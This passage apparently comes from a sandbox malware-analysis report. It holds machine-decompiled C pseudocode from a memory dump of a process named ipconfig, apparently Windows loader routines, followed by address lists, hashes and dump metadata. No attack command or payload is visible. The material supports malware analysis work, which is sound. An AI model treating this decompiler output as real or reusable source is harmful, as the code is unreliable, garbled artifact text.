              				unsigned int _t297;
              				signed int _t306;
              				signed int _t307;
              				signed int _t308;
              				signed int _t309;
              				signed int _t310;
              				intOrPtr _t311;
              				intOrPtr _t312;
              				signed int _t319;
              				intOrPtr _t320;
              				signed int* _t324;
              				signed int _t337;
              				signed int _t338;
              				signed int _t339;
              				intOrPtr* _t340;
              				void* _t341;
              				signed int _t344;
              				signed int _t348;
              				signed int _t349;
              				signed int _t351;
              				intOrPtr _t353;
              				void* _t354;
              				signed int _t356;
              				signed int _t358;
              				intOrPtr _t359;
              				signed int _t361;
              				signed int _t363;
              				signed short* _t365;
              				void* _t367;
              				intOrPtr _t369;
              				void* _t370;
              				signed int _t371;
              				signed int _t372;
              				void* _t374;
              				signed int _t376;
              				void* _t384;
              				signed int _t387;
              
              				_v8 =  *0x2f8d360 ^ _t376;
              				_t2 =  &_a20;
              				 *_t2 = _a20 & 0x00000001;
              				_t287 = _a4;
              				_v200 = _a12;
              				_t365 = _a8;
              				_v212 = _a16;
              				_v180 = _a24;
              				_v168 = 0;
              				_v157 = 0;
              				if( *_t2 != 0) {
              					__eflags = E02EA6600(0x2f852d8);
              					if(__eflags == 0) {
              						goto L1;
              					} else {
              						_v188 = 6;
              					}
              				} else {
              					L1:
              					_v188 = 9;
              				}
              				if(_t365 == 0) {
              					_v164 = 0;
              					goto L5;
              				} else {
              					_t363 =  *_t365 & 0x0000ffff;
              					_t341 = _t363 + 1;
              					if((_t365[1] & 0x0000ffff) < _t341) {
              						L109:
              						__eflags = _t341 - 0x80;
              						if(_t341 <= 0x80) {
              							_t281 =  &_v140;
              							_v164 =  &_v140;
              							goto L114;
              						} else {
              							_t283 =  *0x2f87b9c; // 0x0
              							_t281 = L02EB4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
              							_v164 = _t281;
              							__eflags = _t281;
              							if(_t281 != 0) {
              								_v157 = 1;
              								L114:
              								E02EDF3E0(_t281, _t365[2], _t363);
              								_t200 = _v164;
              								 *((char*)(_v164 + _t363)) = 0;
              								goto L5;
              							} else {
              								_t204 = 0xc000009a;
              								goto L47;
              							}
              						}
              					} else {
              						_t200 = _t365[2];
              						_v164 = _t200;
              						if( *((char*)(_t200 + _t363)) != 0) {
              							goto L109;
              						} else {
              							while(1) {
              								L5:
              								_t353 = 0;
              								_t342 = 0x1000;
              								_v176 = 0;
              								if(_t287 == 0) {
              									break;
              								}
              								_t384 = _t287 -  *0x2f87b90; // 0x779c0000
              								if(_t384 == 0) {
              									_t353 =  *0x2f87b8c; // 0x402a08
              									_v176 = _t353;
              									_t63 = _t353 + 0x50; // 0x402ab8
              									_t64 =  *_t63 + 0x20; // 0x9
              									_t320 =  *_t64;
              									_v184 = _t320;
              								} else {
              									E02EB2280(_t200, 0x2f884d8);
              									_t277 =  *0x2f885f4; // 0x402ef8
              									_t351 =  *0x2f885f8 & 1;
              									while(_t277 != 0) {
              										_t21 = _t277 - 0x50; // 0x75130000
              										_t337 =  *_t21;
              										if(_t337 > _t287) {
              											_t338 = _t337 | 0xffffffff;
              										} else {
              											asm("sbb ecx, ecx");
              											_t338 =  ~_t337;
              										}
              										_t387 = _t338;
              										if(_t387 < 0) {
              											_t339 =  *_t277;
              											__eflags = _t351;
              											if(_t351 != 0) {
              												__eflags = _t339;
              												if(_t339 == 0) {
              													goto L16;
              												} else {
              													goto L118;
              												}
              												goto L151;
              											} else {
              												goto L16;
              											}
              											goto L17;
              										} else {
              											if(_t387 <= 0) {
              												__eflags = _t277;
              												if(_t277 != 0) {
              													_t23 = _t277 - 0x18; // 0x402f40
              													_t340 =  *_t23;
              													_t24 = _t277 - 0x68; // 0x402e90
              													_t353 = _t24;
              													_v176 = _t353;
              													__eflags =  *((intOrPtr*)(_t340 + 0xc)) - 0xffffffff;
              													if( *((intOrPtr*)(_t340 + 0xc)) != 0xffffffff) {
              														_t279 =  *_t340;
              														__eflags =  *(_t279 - 0x20) & 0x00000020;
              														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
              															asm("lock inc dword [edi+0x9c]");
              															_t30 = _t353 + 0x50; // 0x402f40
              															_t340 =  *_t30;
              														}
              													}
              													_t31 = _t340 + 0x20; // 0x9
              													_v184 =  *_t31;
              												}
              											} else {
              												_t22 = _t277 + 4; // 0x41aa70
              												_t339 =  *_t22;
              												if(_t351 != 0) {
              													__eflags = _t339;
              													if(_t339 == 0) {
              														goto L16;
              													} else {
              														L118:
              														_t277 = _t277 ^ _t339;
              														goto L17;
              													}
              													goto L151;
              												} else {
              													L16:
              													_t277 = _t339;
              												}
              												goto L17;
              											}
              										}
              										goto L25;
              										L17:
              									}
              									L25:
              									E02EAFFB0(_t287, _t353, 0x2f884d8);
              									_t320 = _v184;
              									_t342 = 0x1000;
              								}
              								if(_t353 == 0) {
              									break;
              								} else {
              									_t366 = 0;
              									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
              										_t288 = _v164;
              										if(_t353 != 0) {
              											_t342 = _t288;
              											_t374 = E02EECC99(_t353, _t288, _v200, 1,  &_v168);
              											if(_t374 >= 0) {
              												if(_v184 == 7) {
              													__eflags = _a20;
              													if(__eflags == 0) {
              														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
              														if(__eflags != 0) {
              															_t271 = E02EA6600(0x2f852d8);
              															__eflags = _t271;
              															if(__eflags == 0) {
              																_t342 = 0;
              																_v169 = _t271;
              																_t374 = E02EA7926( *(_t353 + 0x50), 0,  &_v169);
              															}
              														}
              													}
              												}
              												if(_t374 < 0) {
              													_v168 = 0;
              												} else {
              													if( *0x2f8b239 != 0) {
              														_t342 =  *(_t353 + 0x18);
              														E02F1E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
              													}
              													if( *0x2f88472 != 0) {
              														_v192 = 0;
              														_t342 =  *0x7ffe0330;
              														_t361 =  *0x2f8b218; // 0x0
              														asm("ror edi, cl");
              														 *0x2f8b1e0( &_v192, _t353, _v168, 0, _v180);
              														 *(_t361 ^  *0x7ffe0330)();
              														_t269 = _v192;
              														_t353 = _v176;
              														__eflags = _t269;
              														if(__eflags != 0) {
              															_v168 = _t269;
              														}
              													}
              												}
              											}
              											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
              												_t366 = 0xc000007a;
              											}
              											_t247 =  *(_t353 + 0x50);
              											if(_t247[3] == 0xffffffff) {
              												L40:
              												if(_t366 == 0xc000007a) {
              													__eflags = _t288;
              													if(_t288 == 0) {
              														goto L136;
              													} else {
              														_t366 = 0xc0000139;
              													}
              													goto L54;
              												}
              											} else {
              												_t249 =  *_t247;
              												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
              													goto L40;
              												} else {
              													_t250 = _t249 | 0xffffffff;
              													asm("lock xadd [edi+0x9c], eax");
              													if((_t249 | 0xffffffff) == 0) {
              														E02EB2280(_t250, 0x2f884d8);
              														_t342 =  *(_t353 + 0x54);
              														_t165 = _t353 + 0x54; // 0x54
              														_t252 = _t165;
              														__eflags =  *(_t342 + 4) - _t252;
              														if( *(_t342 + 4) != _t252) {
              															L135:
              															asm("int 0x29");
              															L136:
              															_t288 = _v200;
              															_t366 = 0xc0000138;
              															L54:
              															_t342 = _t288;
              															L02ED3898(0, _t288, _t366);
              														} else {
              															_t324 =  *(_t252 + 4);
              															__eflags =  *_t324 - _t252;
              															if( *_t324 != _t252) {
              																goto L135;
              															} else {
              																 *_t324 = _t342;
              																 *(_t342 + 4) = _t324;
              																_t293 =  *(_t353 + 0x50);
              																_v180 =  *_t293;
              																E02EAFFB0(_t293, _t353, 0x2f884d8);
              																__eflags =  *((short*)(_t353 + 0x3a));
              																if( *((short*)(_t353 + 0x3a)) != 0) {
              																	_t342 = 0;
              																	__eflags = 0;
              																	E02ED37F5(_t353, 0);
              																}
              																E02ED0413(_t353);
              																_t256 =  *(_t353 + 0x48);
              																__eflags = _t256;
              																if(_t256 != 0) {
              																	__eflags = _t256 - 0xffffffff;
              																	if(_t256 != 0xffffffff) {
              																		E02EC9B10(_t256);
              																	}
              																}
              																__eflags =  *(_t353 + 0x28);
              																if( *(_t353 + 0x28) != 0) {
              																	_t174 = _t353 + 0x24; // 0x24
              																	E02EC02D6(_t174);
              																}
              																L02EB77F0( *0x2f87b98, 0, _t353);
              																__eflags = _v180 - _t293;
              																if(__eflags == 0) {
              																	E02ECC277(_t293, _t366);
              																}
              																_t288 = _v164;
              																goto L40;
              															}
              														}
              													} else {
              														goto L40;
              													}
              												}
              											}
              										}
              									} else {
              										L02EAEC7F(_t353);
              										L02EC19B8(_t287, 0, _t353, 0);
              										_t200 = E02E9F4E3(__eflags);
              										continue;
              									}
              								}
              								L41:
              								if(_v157 != 0) {
              									L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
              								}
              								if(_t366 < 0) {
              									L46:
              									 *_v212 = _v168;
              									_t204 = _t366;
              									L47:
              									_pop(_t354);
              									_pop(_t367);
              									_pop(_t289);
              									return E02EDB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
              								} else {
              									_t206 =  *0x2f8b2f8; // 0x700000
              									if((_t206 |  *0x2f8b2fc) == 0 || ( *0x2f8b2e4 & 0x00000001) != 0) {
              										goto L46;
              									} else {
              										_t297 =  *0x2f8b2ec; // 0x100
              										_v200 = 0;
              										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
              											_t355 = _v168;
              											_t342 =  &_v208;
              											_t208 = E02F46B68(_v168,  &_v208, _v168, __eflags);
              											__eflags = _t208 - 1;
              											if(_t208 == 1) {
              												goto L46;
              											} else {
              												__eflags = _v208 & 0x00000010;
              												if((_v208 & 0x00000010) == 0) {
              													goto L46;
              												} else {
              													_t342 = 4;
              													_t366 = E02F46AEB(_t355, 4,  &_v216);
              													__eflags = _t366;
              													if(_t366 >= 0) {
              														goto L46;
              													} else {
              														asm("int 0x29");
              														_t356 = 0;
              														_v44 = 0;
              														_t290 = _v52;
              														__eflags = 0;
              														if(0 == 0) {
              															L108:
              															_t356 = 0;
              															_v44 = 0;
              															goto L63;
              														} else {
              															__eflags = 0;
              															if(0 < 0) {
              																goto L108;
              															}
              															L63:
              															_v112 = _t356;
              															__eflags = _t356;
              															if(_t356 == 0) {
              																L143:
              																_v8 = 0xfffffffe;
              																_t211 = 0xc0000089;
              															} else {
              																_v36 = 0;
              																_v60 = 0;
              																_v48 = 0;
              																_v68 = 0;
              																_v44 = _t290 & 0xfffffffc;
              																E02EAE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
              																_t306 = _v68;
              																__eflags = _t306;
              																if(_t306 == 0) {
              																	_t216 = 0xc000007b;
              																	_v36 = 0xc000007b;
              																	_t307 = _v60;
              																} else {
              																	__eflags = _t290 & 0x00000001;
              																	if(__eflags == 0) {
              																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
              																		__eflags = _t349 - 0x10b;
              																		if(_t349 != 0x10b) {
              																			__eflags = _t349 - 0x20b;
              																			if(_t349 == 0x20b) {
              																				goto L102;
              																			} else {
              																				_t307 = 0;
              																				_v48 = 0;
              																				_t216 = 0xc000007b;
              																				_v36 = 0xc000007b;
              																				goto L71;
              																			}
              																		} else {
              																			L102:
              																			_t307 =  *(_t306 + 0x50);
              																			goto L69;
              																		}
              																		goto L151;
              																	} else {
              																		_t239 = L02EAEAEA(_t290, _t290, _t356, _t366, __eflags);
              																		_t307 = _t239;
              																		_v60 = _t307;
              																		_v48 = _t307;
              																		__eflags = _t307;
              																		if(_t307 != 0) {
              																			L70:
              																			_t216 = _v36;
              																		} else {
              																			_push(_t239);
              																			_push(0x14);
              																			_push( &_v144);
              																			_push(3);
              																			_push(_v44);
              																			_push(0xffffffff);
              																			_t319 = E02ED9730();
              																			_v36 = _t319;
              																			__eflags = _t319;
              																			if(_t319 < 0) {
              																				_t216 = 0xc000001f;
              																				_v36 = 0xc000001f;
              																				_t307 = _v60;
              																			} else {
              																				_t307 = _v132;
              																				L69:
              																				_v48 = _t307;
              																				goto L70;
              																			}
              																		}
              																	}
              																}
              																L71:
              																_v72 = _t307;
              																_v84 = _t216;
              																__eflags = _t216 - 0xc000007b;
              																if(_t216 == 0xc000007b) {
              																	L150:
              																	_v8 = 0xfffffffe;
              																	_t211 = 0xc000007b;
              																} else {
              																	_t344 = _t290 & 0xfffffffc;
              																	_v76 = _t344;
              																	__eflags = _v40 - _t344;
              																	if(_v40 <= _t344) {
              																		goto L150;
              																	} else {
              																		__eflags = _t307;
              																		if(_t307 == 0) {
              																			L75:
              																			_t217 = 0;
              																			_v104 = 0;
              																			__eflags = _t366;
              																			if(_t366 != 0) {
              																				__eflags = _t290 & 0x00000001;
              																				if((_t290 & 0x00000001) != 0) {
              																					_t217 = 1;
              																					_v104 = 1;
              																				}
              																				_t290 = _v44;
              																				_v52 = _t290;
              																			}
              																			__eflags = _t217 - 1;
              																			if(_t217 != 1) {
              																				_t369 = 0;
              																				_t218 = _v40;
              																				goto L91;
              																			} else {
              																				_v64 = 0;
              																				E02EAE9C0(1, _t290, 0, 0,  &_v64);
              																				_t309 = _v64;
              																				_v108 = _t309;
              																				__eflags = _t309;
              																				if(_t309 == 0) {
              																					goto L143;
              																				} else {
              																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
              																					__eflags = _t226 - 0x10b;
              																					if(_t226 != 0x10b) {
              																						__eflags = _t226 - 0x20b;
              																						if(_t226 != 0x20b) {
              																							goto L143;
              																						} else {
              																							_t371 =  *(_t309 + 0x98);
              																							goto L83;
              																						}
              																					} else {
              																						_t371 =  *(_t309 + 0x88);
              																						L83:
              																						__eflags = _t371;
              																						if(_t371 != 0) {
              																							_v80 = _t371 - _t356 + _t290;
              																							_t310 = _v64;
              																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
              																							_t292 =  *(_t310 + 6) & 0x0000ffff;
              																							_t311 = 0;
              																							__eflags = 0;
              																							while(1) {
              																								_v120 = _t311;
              																								_v116 = _t348;
              																								__eflags = _t311 - _t292;
              																								if(_t311 >= _t292) {
              																									goto L143;
              																								}
              																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
              																								__eflags = _t371 - _t359;
              																								if(_t371 < _t359) {
              																									L98:
              																									_t348 = _t348 + 0x28;
              																									_t311 = _t311 + 1;
              																									continue;
              																								} else {
              																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
              																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
              																										goto L98;
              																									} else {
              																										__eflags = _t348;
              																										if(_t348 == 0) {
              																											goto L143;
              																										} else {
              																											_t218 = _v40;
              																											_t312 =  *_t218;
              																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
              																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
              																												_v100 = _t359;
              																												_t360 = _v108;
              																												_t372 = L02EA8F44(_v108, _t312);
              																												__eflags = _t372;
              																												if(_t372 == 0) {
              																													goto L143;
              																												} else {
              																													_t290 = _v52;
              																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E02ED3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
              																													_t307 = _v72;
              																													_t344 = _v76;
              																													_t218 = _v40;
              																													goto L91;
              																												}
              																											} else {
              																												_t290 = _v52;
              																												_t307 = _v72;
              																												_t344 = _v76;
              																												_t369 = _v80;
              																												L91:
              																												_t358 = _a4;
              																												__eflags = _t358;
              																												if(_t358 == 0) {
              																													L95:
              																													_t308 = _a8;
              																													__eflags = _t308;
              																													if(_t308 != 0) {
              																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
              																													}
              																													_v8 = 0xfffffffe;
              																													_t211 = _v84;
              																												} else {
              																													_t370 =  *_t218 - _t369 + _t290;
              																													 *_t358 = _t370;
              																													__eflags = _t370 - _t344;
              																													if(_t370 <= _t344) {
              																														L149:
              																														 *_t358 = 0;
              																														goto L150;
              																													} else {
              																														__eflags = _t307;
              																														if(_t307 == 0) {
              																															goto L95;
              																														} else {
              																															__eflags = _t370 - _t344 + _t307;
              																															if(_t370 >= _t344 + _t307) {
              																																goto L149;
              																															} else {
              																																goto L95;
              																															}
              																														}
              																													}
              																												}
              																											}
              																										}
              																									}
              																								}
              																								goto L97;
              																							}
              																						}
              																						goto L143;
              																					}
              																				}
              																			}
              																		} else {
              																			__eflags = _v40 - _t307 + _t344;
              																			if(_v40 >= _t307 + _t344) {
              																				goto L150;
              																			} else {
              																				goto L75;
              																			}
              																		}
              																	}
              																}
              															}
              															L97:
              															 *[fs:0x0] = _v20;
              															return _t211;
              														}
              													}
              												}
              											}
              										} else {
              											goto L46;
              										}
              									}
              								}
              								goto L151;
              							}
              							_t288 = _v164;
              							_t366 = 0xc0000135;
              							goto L41;
              						}
              					}
              				}
              				L151:
              			}

              0x02eadd2d
              0x02eadd2f
              0x02eadd32
              0x02eadd35
              0x00000000
              0x02eadd35
              0x02eadc5b
              0x02eadc5b
              0x02eadc5e
              0x02eadc61
              0x02eadc64
              0x02eadc67
              0x02eadc67
              0x02eadc6a
              0x02eadc6c
              0x02eadc8e
              0x02eadc8e
              0x02eadc91
              0x02eadc93
              0x02eadcce
              0x02eadcce
              0x02eadc95
              0x02eadc9c
              0x02eadc6e
              0x02eadc72
              0x02eadc75
              0x02eadc77
              0x02eadc79
              0x02efb551
              0x02efb551
              0x00000000
              0x02eadc7f
              0x02eadc7f
              0x02eadc81
              0x00000000
              0x02eadc83
              0x02eadc86
              0x02eadc88
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x02eadc88
              0x02eadc81
              0x02eadc79
              0x02eadc6c
              0x02eadc55
              0x02eadc47
              0x02eadc43
              0x00000000
              0x02eadc36
              0x02eadc23
              0x00000000
              0x02eadbff
              0x02eadbf1
              0x02eadbdf
              0x02eadb8f
              0x02eadb92
              0x02eadb95
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x02eadb95
              0x02eadb8d
              0x02eadb85
              0x02eadb74
              0x02eadc9f
              0x02eadca2
              0x02eadcb0
              0x02eadcb0
              0x02eadad1
              0x02efb4e5
              0x02efb4c8
              0x00000000
              0x00000000
              0x00000000
              0x02ead831
              0x02ead80d
              0x00000000
              0x02ead800
              0x02efb47f
              0x02efb485
              0x00000000
              0x02efb485
              0x02ead665
              0x02ead652
              0x00000000

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 47e8f311b76ed44a712aa25106241fc882b2d1d51f65d025551e78a62e19c2da
              • Instruction ID: 2e6bf3b956dfc4f040dd06582b5ade9c364a21c185e60ec86fcbb9464805f4de
              • Opcode Fuzzy Hash: 47e8f311b76ed44a712aa25106241fc882b2d1d51f65d025551e78a62e19c2da
              • Instruction Fuzzy Hash: 83E1E330A80359CFDB25DF18CD64BA9B7B6BF8530CF049199E9099B690D770A981CF51
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 92%
              			E02EA849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
              				void* _t136;
              				signed int _t139;
              				signed int _t141;
              				signed int _t145;
              				intOrPtr _t146;
              				signed int _t149;
              				signed int _t150;
              				signed int _t161;
              				signed int _t163;
              				signed int _t165;
              				signed int _t169;
              				signed int _t171;
              				signed int _t194;
              				signed int _t200;
              				void* _t201;
              				signed int _t204;
              				signed int _t206;
              				signed int _t210;
              				signed int _t214;
              				signed int _t215;
              				signed int _t218;
              				void* _t221;
              				signed int _t224;
              				signed int _t226;
              				intOrPtr _t228;
              				signed int _t232;
              				signed int _t233;
              				signed int _t234;
              				void* _t237;
              				void* _t238;
              
              				_t236 = __esi;
              				_t235 = __edi;
              				_t193 = __ebx;
              				_push(0x70);
              				_push(0x2f6f9c0);
              				E02EED0E8(__ebx, __edi, __esi);
              				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
              				if( *0x2f87b04 == 0) {
              					L4:
              					goto L5;
              				} else {
              					_t136 = E02EACEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
              					_t236 = 0;
              					if(_t136 < 0) {
              						 *((intOrPtr*)(_t237 - 0x54)) = 0;
              					}
              					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
              						_t193 =  *( *[fs:0x30] + 0x18);
              						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
              						 *(_t237 - 0x68) = _t236;
              						 *(_t237 - 0x6c) = _t236;
              						_t235 = _t236;
              						 *(_t237 - 0x60) = _t236;
              						E02EB2280( *[fs:0x30], 0x2f88550);
              						_t139 =  *0x2f87b04; // 0x1
              						__eflags = _t139 - 1;
              						if(__eflags != 0) {
              							_t200 = 0xc;
              							_t201 = _t237 - 0x40;
              							_t141 = E02ECF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
              							 *(_t237 - 0x44) = _t141;
              							__eflags = _t141;
              							if(_t141 < 0) {
              								L50:
              								E02EAFFB0(_t193, _t235, 0x2f88550);
              								L5:
              								return E02EED130(_t193, _t235, _t236);
              							}
              							_push(_t201);
              							_t221 = 0x10;
              							_t202 =  *(_t237 - 0x40);
              							_t145 = E02E91C45( *(_t237 - 0x40), _t221);
              							 *(_t237 - 0x44) = _t145;
              							__eflags = _t145;
              							if(_t145 < 0) {
              								goto L50;
              							}
              							_t146 =  *0x2f87b9c; // 0x0
              							_t235 = L02EB4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
              							 *(_t237 - 0x60) = _t235;
              							__eflags = _t235;
              							if(_t235 == 0) {
              								_t149 = 0xc0000017;
              								 *(_t237 - 0x44) = 0xc0000017;
              							} else {
              								_t149 =  *(_t237 - 0x44);
              							}
              							__eflags = _t149;
              							if(__eflags >= 0) {
              								L8:
              								 *(_t237 - 0x64) = _t235;
              								_t150 =  *0x2f87b10; // 0x8
              								 *(_t237 - 0x4c) = _t150;
              								_push(_t237 - 0x74);
              								_push(_t237 - 0x39);
              								_push(_t237 - 0x58);
              								_t193 = E02ECA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
              								 *(_t237 - 0x44) = _t193;
              								__eflags = _t193;
              								if(_t193 < 0) {
              									L30:
              									E02EAFFB0(_t193, _t235, 0x2f88550);
              									__eflags = _t235 - _t237 - 0x38;
              									if(_t235 != _t237 - 0x38) {
              										_t235 =  *(_t237 - 0x48);
              										L02EB77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
              									} else {
              										_t235 =  *(_t237 - 0x48);
              									}
              									__eflags =  *(_t237 - 0x6c);
              									if( *(_t237 - 0x6c) != 0) {
              										L02EB77F0(_t235, _t236,  *(_t237 - 0x6c));
              									}
              									__eflags = _t193;
              									if(_t193 >= 0) {
              										goto L4;
              									} else {
              										goto L5;
              									}
              								}
              								_t204 =  *0x2f87b04; // 0x1
              								 *(_t235 + 8) = _t204;
              								__eflags =  *((char*)(_t237 - 0x39));
              								if( *((char*)(_t237 - 0x39)) != 0) {
              									 *(_t235 + 4) = 1;
              									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
              									_t161 =  *0x2f87b10; // 0x8
              									 *(_t237 - 0x4c) = _t161;
              								} else {
              									 *(_t235 + 4) = _t236;
              									 *(_t235 + 0xc) =  *(_t237 - 0x58);
              								}
              								 *((intOrPtr*)(_t237 - 0x54)) = E02ED37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
              								_t224 = _t236;
              								 *(_t237 - 0x40) = _t236;
              								 *(_t237 - 0x50) = _t236;
              								while(1) {
              									_t163 =  *(_t235 + 8);
              									__eflags = _t224 - _t163;
              									if(_t224 >= _t163) {
              										break;
              									}
              									_t228 =  *0x2f87b9c; // 0x0
              									_t214 = L02EB4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
              									 *(_t237 - 0x78) = _t214;
              									__eflags = _t214;
              									if(_t214 == 0) {
              										L52:
              										_t193 = 0xc0000017;
              										L19:
              										 *(_t237 - 0x44) = _t193;
              										L20:
              										_t206 =  *(_t237 - 0x40);
              										__eflags = _t206;
              										if(_t206 == 0) {
              											L26:
              											__eflags = _t193;
              											if(_t193 < 0) {
              												E02ED37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
              												__eflags =  *((char*)(_t237 - 0x39));
              												if( *((char*)(_t237 - 0x39)) != 0) {
              													 *0x2f87b10 =  *0x2f87b10 - 8;
              												}
              											} else {
              												_t169 =  *(_t237 - 0x68);
              												__eflags = _t169;
              												if(_t169 != 0) {
              													 *0x2f87b04 =  *0x2f87b04 - _t169;
              												}
              											}
              											__eflags = _t193;
              											if(_t193 >= 0) {
              												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
              											}
              											goto L30;
              										}
              										_t226 = _t206 * 0xc;
              										__eflags = _t226;
              										_t194 =  *(_t237 - 0x48);
              										do {
              											 *(_t237 - 0x40) = _t206 - 1;
              											_t226 = _t226 - 0xc;
              											 *(_t237 - 0x4c) = _t226;
              											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
              											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
              												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
              												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
              													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
              													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
              													__eflags =  *((char*)(_t237 - 0x39));
              													if( *((char*)(_t237 - 0x39)) == 0) {
              														_t171 = _t210;
              													} else {
              														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
              														L02EB77F0(_t194, _t236, _t210 - 8);
              														_t171 =  *(_t237 - 0x50);
              													}
              													L48:
              													L02EB77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
              													L46:
              													_t206 =  *(_t237 - 0x40);
              													_t226 =  *(_t237 - 0x4c);
              													goto L24;
              												}
              												 *0x2f87b08 =  *0x2f87b08 + 1;
              												goto L24;
              											}
              											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
              											__eflags = _t171;
              											if(_t171 != 0) {
              												__eflags =  *((char*)(_t237 - 0x39));
              												if( *((char*)(_t237 - 0x39)) == 0) {
              													goto L48;
              												}
              												E02ED57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
              												goto L46;
              											}
              											L24:
              											__eflags = _t206;
              										} while (_t206 != 0);
              										_t193 =  *(_t237 - 0x44);
              										goto L26;
              									}
              									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
              									 *(_t237 - 0x7c) = _t232;
              									 *(_t232 - 4) = _t214;
              									 *(_t237 - 4) = _t236;
              									E02EDF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
              									_t238 = _t238 + 0xc;
              									 *(_t237 - 4) = 0xfffffffe;
              									_t215 =  *(_t237 - 0x48);
              									__eflags = _t193;
              									if(_t193 < 0) {
              										L02EB77F0(_t215, _t236,  *(_t237 - 0x78));
              										goto L20;
              									}
              									__eflags =  *((char*)(_t237 - 0x39));
              									if( *((char*)(_t237 - 0x39)) != 0) {
              										_t233 = E02ECA44B( *(_t237 - 0x4c));
              										 *(_t237 - 0x50) = _t233;
              										__eflags = _t233;
              										if(_t233 == 0) {
              											L02EB77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
              											goto L52;
              										}
              										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
              										L17:
              										_t234 =  *(_t237 - 0x40);
              										_t218 = _t234 * 0xc;
              										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
              										 *(_t218 + _t235 + 0x10) = _t236;
              										_t224 = _t234 + 1;
              										 *(_t237 - 0x40) = _t224;
              										 *(_t237 - 0x50) = _t224;
              										_t193 =  *(_t237 - 0x44);
              										continue;
              									}
              									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
              									goto L17;
              								}
              								 *_t235 = _t236;
              								_t165 = 0x10 + _t163 * 0xc;
              								__eflags = _t165;
              								_push(_t165);
              								_push(_t235);
              								_push(0x23);
              								_push(0xffffffff);
              								_t193 = E02ED96C0();
              								goto L19;
              							} else {
              								goto L50;
              							}
              						}
              						_t235 = _t237 - 0x38;
              						 *(_t237 - 0x60) = _t235;
              						goto L8;
              					}
              					goto L4;
              				}
              			}


































              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
